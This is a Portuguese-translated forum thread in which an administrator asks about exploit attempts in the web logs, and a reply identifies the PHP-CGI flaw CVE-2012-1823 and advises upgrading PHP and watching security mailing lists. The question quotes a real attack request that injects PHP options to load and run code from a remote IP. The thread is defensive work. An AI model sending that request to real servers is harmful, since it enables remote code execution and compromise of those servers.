Organizadores potenciais do Bot-Net sondando novas máquinas?

2

Estou recebendo várias tentativas de exploração de IPs diferentes hoje.

GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt

O conteúdo do info3.txt é:

O Google está mostrando um monte de pessoas falando sobre isso nos últimos dias, mas não há soluções reais ou explicações sobre o que é isso. Há um writeup em: link

"Acho que é aqui que vou deixar as coisas por enquanto. Não sei se esse site é parte de um crime, mas como ele tem acesso a um botnet, vou assumir que ele é." .24.82 O IP não está aparecendo em nenhum lugar como um distribuidor de malware que seja estranho, talvez seja um servidor da Web recentemente comprometido ou um endereço IP recentemente adquirido por quem quer que esteja organizando esse ataque. "

A minha pergunta é: Qual é o próximo passo em situações como esta? Existe uma prática recomendada que os administradores devem seguir para notificar o pessoal de segurança? Quais sites você segue para se manter informado sobre isso e aplicar as devidas proteções (como o mod_security)?

    
por Ryan Johnston 24.05.2012 / 18:37

1 resposta

3

É óbvio que eles tentam explorar o bug recente encontrado no PHP quando configurado como CGI ( CVE-2012-1823 )

O que eles estão tentando alcançar no final, só podemos adivinhar até ouvirmos pessoas que realmente se comprometeram e analisaram o servidor depois.
Pelo que parece no momento, está sendo tentado executar o shell C99 nesses servidores. Não podemos vincular isso ao recrutamento de botnets ou a qualquer outra finalidade ainda.

Como administrador, você deve verificar se não está vulnerável a esse ataque.
O que neste caso é verificar se você tem PHP > = 5.3.12 implementado.

Você pode tentar contatar a equipe de abuso do proprietário do IP do qual o ataque está originando e o IP no qual o info3.txt está sendo hospedado. Mas esse provedor provavelmente não ficará muito impressionado com sua reivindicação.

Notificar pessoas de segurança?
Não, eu não tentaria explorar um bug conhecido.

Achei útil assinar a segurança e / ou anunciar a lista de discussão do software que estou expondo à Internet e ao nosso sistema operacional básico.
Dessa forma, estou sendo notificado rapidamente sobre problemas de segurança e novos lançamentos que realmente me preocupam.

    
por 24.05.2012 / 20:02